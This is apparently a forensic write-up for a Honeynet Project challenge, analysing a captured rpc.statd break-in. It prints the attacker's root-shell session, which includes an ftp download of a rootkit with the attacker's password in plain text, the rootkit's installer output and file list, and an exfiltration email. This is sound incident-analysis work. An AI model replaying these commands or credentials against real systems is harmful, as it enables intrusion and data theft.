September Logo Image

This is my first attempt at actually submitting an answer to a honeynet challenge.

First I downloaded the snort binary file snort-0315@0005.log.tar.gz.

I extracted the snort binary: gzip -dc snort-0315@0005.log.tar.gz | tar -xof -

I could have extracted the file with: tar -zxvf snort-0315@0005.log.tar.gz

I started ethereal and loaded snort-0315@0005.log.

Knowing that the attackers were using an rpc.statd attack, I typed this filter in to ethereal to find all of the ip's that were attempting to exploit rpc.statd: tcp.port eq 111 and ip.addr eq 172.16.1.108

The resulting information showed that 211.185.125.124 had an extended conversation on port 111. There was also a single probe from 203.111.78.182 at 04:53.29.0532 which appears to have been the initial contact from this attacker during a scan sweep. A quick check proved that this was indeed the case by changing the ethereal filter to: ip.addr eq 203.111.78.182

I then switched to a new filter with ethereal: ip.addr eq 211.185.125.124

This allowed me to see all of the packets that were originating from 211.185.125.124

I noticed that at packet 132 that the ports changed. I right clicked on packet 132 and told ethereal to follow this tcp stream. This showed me that the attacker had opened a root shell on port 39168 and allowed me to see what their script was doing.

cd /; uname -a; id;
Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
uid=0(root) gid=0(root)
ftp -v ftp.home.ro
Connected to ftp.home.ro.
220-
220-
220-                           H O M E  .  R  O
220-
220-                 This server is for HOME.RO members only.
220-                  Go to http://www.home.ro/ to register.
220-
220-                      No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.0rc3 Server (HOME.RO Members FTP) [193.231.236.41]
soane
Name (ftp.home.ro:root): 331 Password required for soane.
Password:i2ttgcj1d
230 User soane logged in.
get lk.tgz
Remote system type is UNIX.
Using binary mode to transfer files.
local: lk.tgz remote: lk.tgz
200 PORT command successful.
150 Opening BINARY mode data connection for lk.tgz (520333 bytes).
226 Transfer complete.
bye
520333 bytes received in 35.5 secs (14 Kbytes/sec)
421 Idle Timeout (240 seconds): closing control connection.
tar -zxvf lk.tgz
last/
tar: Archive contains future timestamp 2002-02-08 07:08:13
last/ssh
last/pidfile
last/install
last/linsniffer
last/cleaner
last/inetd.conf
last/lsattr
last/services
last/sense
last/ssh_config
last/ssh_host_key
last/ssh_host_key.pub
last/ssh_random_seed
last/sshd_config
last/sl2
last/last.cgi
last/ps
last/netstat
last/ifconfig
last/top
last/logclear
last/s
last/mkxfs
cd last
./install
********* Instalarea Rootkitului A Pornit La Drum *********
********* Mircea SUGI PULA ********************************
********* Multumiri La Toti Care M-Au Ajutat **************
********* Lemme Give You A Tip : **************************
********* Ignore everything, call your freedom ************
********* Scream & swear as much as you can ***************
********* Cuz anyway nobody will hear you and no one will *
********* Care about you **********************************

Are Make !
Are Gcc !
Nu Are Ssh !
* Inlocuim nestat ... alea alea * Gata...
* Dev...

* Gata
* Facem Director...Si Mutam Alea..
* Copiem ssh si alea

* Adaugam In Startup:) ...
* Luam Informatiile dorite ...
* Gata ! Trimitem Mailul ...Asteapta Te Rog
* Am trimis mailul ... stergem fisierele care nu mai trebuie .

* G A T A *

* That Was Nice Last

I then searched for the ftp data by changing my ethereal filter to: ip.addr eq 172.16.1.108 and tcp.port eq 21

This showed me that there was an outgoing ftp connection made to 193.231.236.41. Now I knew where the rootkit was downloaded from. To verify this, I changed the ethereal filter to: ip.addr eq 193.231.236.41

This proved that the rootkit was indeed downloaded from 193.231.236.41. I now had the initial information needed to start answering the honeynet challenge questions.


1. The attackers used rpc.statd attack to get into the system. What modifications did they make to the break in process to both automate and make the process faster?

They had the exploit open up a root shell on port 39168. Their script then automatically ftp'ed the lk.tgz file from 193.231.236.41 (home.ro) using the userid of soane and a password of i2ttgcj1d. After the download is completed, the script ran tar -zxvf lk.tgz. The script then automatically ran the install program which sent this email to bidi_damm@yahoo.com to confirm that the system was exploited:

bidi_damm@yahoo.com
Received: (from root@localhost)
    by asdf1 (8.9.3/8.9.3) id TAA00952
    for bidi_damm@yahoo.com; Thu, 15 Mar 2001 19:46:05 -0600
Date: Thu, 15 Mar 2001 19:46:05 -0600
From: root <root@asdf1>
Message-Id: <200103160146.TAA00952@asdf1>
To: bidi_damm@yahoo.com
Subject: roote

* Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
* Hostname : asdf1
* IfConfig :           inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
          inet addr:172.16.1.108  Bcast:172.16.1.255  Mask:255.255.255.0
* Uptime :   7:45pm  up  8:23,  0 users,  load average: 0.00, 0.00, 0.00
* Cpu Vendor ID : vendor_id    : GenuineIntel
* Cpu Model : model        : 4
model name    : Pentium MMX
* Cpu Speed: cpu MHz        : 200.457171
* Bogomips: bogomips    : 399.77
* Spatiu Liber: Filesystem            Size  Used Avail Use% Mounted on
        /dev/hda8             251M   33M  205M  14% /
        /dev/hda1              23M  2.4M   19M  11% /boot
        /dev/hda6             1.6G  2.1M  1.5G   0% /home
        /dev/hda5             1.6G  367M  1.2G  23% /usr
        /dev/hda7             251M  5.3M  232M   2% /var
.
250 ok dirdel
QUIT
221 mta502.mail.yahoo.com



2. What system/country did the badguys come in from?

They came in from 211.185.125.124 which is the Kyongsan Purim Elementary School in Korea.

[jim@localhost honeynet]$ fwhois 211.185.125.124@whois.arin.net
[whois.arin.net]
Asia Pacific Network Information Center (NETBLK-APNIC-CIDR-BLK)
   These addresses have been further assigned to Asia-Pacific users.
   Contact info can be found in the APNIC database,
   at WHOIS.APNIC.NET or http://www.apnic.net/
   Please do not send spam complaints to APNIC.
   AU

   Netname: APNIC-CIDR-BLK2
   Netblock: 210.0.0.0 - 211.255.255.255

   Coordinator:
      Administrator, System  (SA90-ARIN)  [No mailbox]
      +61-7-3367-0490

   Domain System inverse mapping provided by:

   NS.APNIC.NET            203.37.255.97
   SVC00.APNIC.NET        202.12.28.131
   NS.TELSTRA.NET        203.50.0.137
   NS.RIPE.NET            193.0.0.193

   Regional Internet Registry for the Asia-Pacific Region.
  
   *** Use whois -h whois.apnic.net <object>                     ***
 
   *** or see http://www.apnic.net/db/ for database assistance   ***
  

   Record last updated on 03-May-2000.
   Database last updated on 3-Sep-2001 23:06:38 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

This record points me towards whois at apnic.net so I then queried them for the ip information.

[jim@localhost honeynet]$ fwhois 211.185.125.124@whois.apnic.net
[whois.apnic.net]

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

inetnum:     211.172.0.0 - 211.199.255.255
netname:     KRNIC-KR
descr:       KRNIC
descr:       Korea Network Information Center
country:     KR
admin-c:     HM127-AP
tech-c:      HM127-AP
remarks:     ******************************************
remarks:     KRNIC is the National Internet Registry
remarks:     in Korea under APNIC. If you would like to
remarks:     find assignment information in detail
remarks:     please refer to the KRNIC Whois DB
remarks:     http://whois.nic.or.kr/english/index.html
remarks:     ******************************************
mnt-by:      APNIC-HM
mnt-lower:   MNT-KRNIC-AP
changed:     hostmaster@apnic.net 20000607
changed:     hostmaster@apnic.net 20010606
source:      APNIC

person:      Host Master
address:     Korea Network Information Center
address:     Narajongkeum B/D 14F, 1328-3, Seocho-dong, Seocho-ku, Seoul, 137-070, Republic of Korea
country:     KR
phone:       +82-2-2186-4500
fax-no:      +82-2-2186-4496
e-mail:      hostmaster@nic.or.kr
nic-hdl:     HM127-AP
mnt-by:      MNT-KRNIC-AP
changed:     hostmaster@nic.or.kr 20010514
source:      APNIC

The record at apnic pointed towards more information being available at whois.nic.or.kr

[jim@localhost honeynet]$ fwhois 211.185.125.124@whois.nic.or.kr
[whois.nic.or.kr]
# ENGLISH

IP Address         : 211.185.125.0-211.185.125.127
Network Name       : KSPURIM-E
Connect ISP Name   : PUBNET
Connect Date       : 20001120
Registration Date  : 20001129

[ Organization Information ]
Orgnization ID     : ORG147082
Org Name           : Kyongsan Purim Elementary School
State              : KYONGBUK
Address            : 171 puki-1ry jinrang-eup kyongsan-ci
Zip Code           : 712-830

[ Admin Contact Information]
Name               : DAEDUN KYUN
Org Name           : Kyongsan Purim Elementary School
State              : KYONGBUK
Address            : 171 puki-1ry jinrang-eup kyongsan-ci
Zip Code           : 712-830
Phone              : +82-53-851-9523
Fax                : +82-53-851-9522
E-Mail             : gum@hanmail.net

[ Technical Contact Information ]
Name               : DAEDUN KYUN
Org Name           : Kyongsan Purim Elementary School
State              : KYONGBUK
Address            : 171 puki-1ry jinrang-eup kyongsan-ci
Zip Code           : 712-830
Phone              : +82-53-851-9523
Fax                : +82-53-851-9522
E-Mail             : gum@hanmail.net

However, the initial probe came from 203.111.78.182 which breaks down to be a site in Australia:

[jim@localhost september]$ fwhois 203.111.78.182@whois.apnic.net
[whois.apnic.net]

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum:     203.111.0.0 - 203.111.127.255
netname:     DAVNET
descr:       Davnet Telecommunications
descr:       Level 7, 209 Castlereagh Street
descr:       Sydney NSW 2000
country:     AU
admin-c:     DR15-AP
tech-c:      DR15-AP
notify:      routemaster@magna.com.au
mnt-by:      APNIC-HM
mnt-lower:   MAINT-AU-DAVNET
changed:     em@magna.com.au 20001018
source:      APNIC

person:      DavTel Routemaster
address:     209 Castlereagh St
address:     Sydney  NSW  2000
address:     -
address:     Spam & Abuse : abuse@davnet.com.au
country:     AU
phone:       +61-2-9272-9600
fax-no:      +61-2-9272-9664
e-mail:      routemaster@davnet.com.au
nic-hdl:     DR15-AP
mnt-by:      MAINT-AU-DAVNET
changed:     emilia.lambros@davnet.com.au 20010219
source:      APNIC


3. What nationality are the badguys, and how were you able to determine this?

I believe they were Romanian because the site that they downloaded the rootkit from is 193.231.236.41 which is www.home.ro and parts of the installation text appears to be in Romanian. www.home.ro only allow members to access their website, however, they may have exploited that system too.

[jim@localhost honeynet]$ fwhois 193.231.236.41@whois.arin.net
[whois.arin.net]
European Regional Internet Registry/RIPE NCC (NETBLK-RIPE)
   These addresses have been further assigned to European users.
   Contact info can be found in the RIPE database, via the
   WHOIS and TELNET servers at whois.ripe.net, and at
   http://www.ripe.net/db/whois.html
   NL

   Netname: RIPE-CBLK
   Netblock: 193.0.0.0 - 193.255.255.255
   Maintainer: RIPE

   Coordinator:
      Reseaux IP European Network Co-ordination Centre Singel 258  (RIPE-NCC-ARIN)  nicdb@RIPE.NET
      +31 20 535 4444

   Domain System inverse mapping provided by:

   NS.RIPE.NET            193.0.0.193
   NS.EU.NET            192.16.202.11
   AUTH03.NS.UU.NET        198.6.1.83
   NS2.NIC.FR            192.93.0.4
   SUNIC.SUNET.SE        192.36.125.2
   MUNNARI.OZ.AU        128.250.1.21
   NS.APNIC.NET            203.37.255.97

   To search on arbitrary strings, see the Database page on
   the RIPE NCC web-site at http://www.ripe.net/db/

   Record last updated on 16-Oct-1998.
   Database last updated on 3-Sep-2001 23:06:38 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

The information at arin.net pointed me towards ripe.net for more information.

[jim@localhost honeynet]$ fwhois 193.231.236.41@whois.ripe.net
[whois.ripe.net]
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum:      193.231.236.0 - 193.231.236.255
netname:      RDSNET
descr:        Romania Data Systems
country:      RO
admin-c:      RDSH1-RIPE
tech-c:       RDSH1-RIPE
rev-srv:      ns1.rdsnet.ro 193.231.236.17
rev-srv:      ns2.rdsnet.ro 193.231.236.10
status:       ASSIGNED PA
remarks:      object maintained by ro.rnc local registry
notify:       domain-admin@rnc.ro
notify:       as-admin@rdsnet.ro
mnt-by:       AS3233-MNT
changed:      danacorb@sunu.rnc.ro 19971217
changed:      estaicut@rnc.ro 19981123
changed:      cristih@rnc.ro 20000816
changed:      cristih@rnc.ro 20010215
source:       RIPE

route:        193.231.224.0/20
descr:        RDSNET
origin:       AS8708
mnt-by:       AS8708-MNT
changed:      tim@rdsnet.ro 20010320
source:       RIPE

person:       RDS Hostmaster
address:      Romania Data Systems
address:      Str. Sf. Vineri Nr. 25
address:      Bl. 105C, Sector 3
address:      Bucharest / ROMANIA
phone:        +40 1 301 08 88
fax-no:       +40 1 301 08 51
e-mail:       hostmaster@rdsnet.ro
nic-hdl:      RDSH1-RIPE
remarks:      Hostmaster team:
remarks:      Cornel Ciocirlan - CC79-RIPE
remarks:      Andrei Stirbu - AS1385-RIPE
remarks:      Adrian Niculae Gabriel - NAG4-RIPE
remarks:      Dragos Vilceanu - DV461-RIPE
remarks:      Bogdan Surdu - BS747-RIPE
notify:       hostmaster@rdsnet.ro
mnt-by:       AS8708-MNT
changed:      tim@rdsnet.ro 20000424
source:       RIPE


4. What do the answers to questions #1 and #2 tell us about the tactics the badguys are using?

They are becoming more sophisticated and are automatiing their tools. This is making it more difficult to prosecute them by crossing international borders.The problem is truly international in scope. Just because we see that the actual ip that is doing the probing/exploiting doesn't necessarily mean that this is where the prober is from or where the actual attack will come from. The initial probe from Australia proves this point.

5. What did you learn from this challenge?

I learned that the attackers are initially gathering a list of exploitable systems that they would return to at a later time and/or date. The attack does not necessarily come from the system that does the initial probe so blocking an ip address based on a probe does not protect you from being attacked. It also shows that it does not take an attacker long to exploit and clean up after themselves.


6. How long did this challenge take you?

2.0 hours

.5 hours to do my initial search through the snort binary log file.
.5 hours to answer questions 1 through 6
.5 hours to find a way to extract lk.tgz
.5 hours to do the writeup.

Bonus Question:
Can you recover the blackhat's rootkit from the Snort binary log file? If so, how?

Yes.

Instructions for recovering the rootkit from the Snort binary log file using ethereal:

Using Ethereal, my tool of choice, load the snort dump file into memory but tell it not to enable name resolution.

[jim@localhost honeynet]$ ethereal&

Load in the snort binary data snort-0315@0005.log

Type this filter in: ip.addr eq 193.231.236.41

Move your cursor down to the first line that says ftp-data, this should be packet 280.

Right click on this packet and say "Follow TCP Stream".

This will bring up a screen that has the title of "Contents of TCP Stream"

Click on the button that says "Save as"

Save the file out as "lk.tgz"

Close the "Contents of tcp stream" window.

Close the ethereal window.

At the command line type: tar -zxvf lk.tgz

Alternatively you can use this command: gzip -dc lk.tgz | tar -xof -

Ignore the errors that occur, they occur because of the ending packets at the end of the file.

After you extract the files, you will have a directory called "last", inside this directory you will find the contents of the root kit. These files can be verified by the first tcp stream that we followed that showed what the attackers automated script was doing.

tar -zxvf lk.tgz
last/
tar: Archive contains future timestamp 2002-02-08 07:08:13
last/ssh
last/pidfile
last/install
last/linsniffer
last/cleaner
last/inetd.conf
last/lsattr
last/services
last/sense
last/ssh_config
last/ssh_host_key
last/ssh_host_key.pub
last/ssh_random_seed
last/sshd_config
last/sl2
last/last.cgi
last/ps
last/netstat
last/ifconfig
last/top
last/logclear
last/s
last/mkxfs

I want to thank the people involved in the HoneyNet Project for posting these challenges. It allows I and others to learn how to react to and analyze an exploit in a controlled environment. It also allows us to learn more advanced methods from experienced administrators.